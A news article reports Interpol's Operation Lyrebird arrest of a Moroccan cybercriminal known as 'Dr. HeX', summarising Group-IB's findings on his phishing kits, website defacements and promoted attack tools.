Table of Contents
In a phishing and credit card, fraud scheme aimed at telecom and multinational corporations in France, law enforcement authorities has apprehended an alleged threat actor involved in targeting thousands of unwitting victims over several years. Interpol and other law enforcement agencies have finally arrested the Moroccan national culprit
A two-year investigation carried out by the international intergovernmental organization, Operation Lyrebird, led to the arrest of Dr. HeX, a Moroccan national. This information was disclosed today by cybersecurity firm Group-IB in a report.
The cybersecurity firm said:
Dr. HeX is said to have been “active since at least 2009 and is responsible for a number of cybercrimes, including phishing, defacing, malware development, fraud, and carding that resulted in thousands of unsuspecting victims.”
Cyberattacks were conducted by using a phishing kit that was composed of rogue banking websites that spoof German banks, followed by mass emails sent through the rogue websites that asked recipients for their login details. Unsuspecting victims’ credentials were then sent to the perpetrator’s email account when they entered the username and password on the fake web page. We have recovered three different phishing kits, all presumably created by the threat actor.
Interpol said in a statement:
“The phishing kits were also sold to other individuals through online forums to allow them to facilitate similar malicious campaigns against victims. These were then used to impersonate online banking facilities, allowing the suspect and others to steal sensitive information and defraud trusting individuals for financial gain, with the losses of individuals and companies published online in order to advertise these malicious services.”
As part of the phishing kit, scripts contained the name Dr. HeX and the individual’s email address, which allowed us to deanonymize the cybercriminal and discover a YouTube channel and another name used to register two fraudulent domains.
Furthermore, Group-IB said it was also able to map the email address to malicious infrastructure deployed by the accused in multiple phishing campaigns through five emails, six nicknames, and Skype, Facebook, Instagram, and YouTube accounts.
The digital footprint of Dr. Hex left a telltale trail of malign activities spanning from 2009 to 2018. Threat actors defaced at least 134 websites during this period, in addition to being exposed on underground malware trade forums as well as evidence suggesting he had been involved in attacks on French corporations to steal financial information.
Group-IB CTO Dmitry Volkov said:
“The suspect, in particular, promoted the so-called Zombi Bot, which allegedly contained 814 exploits, including 72 private ones, a brute-forcer, web shell, and backdoor scanners, as well as functionality to carry out DDoS attacks.”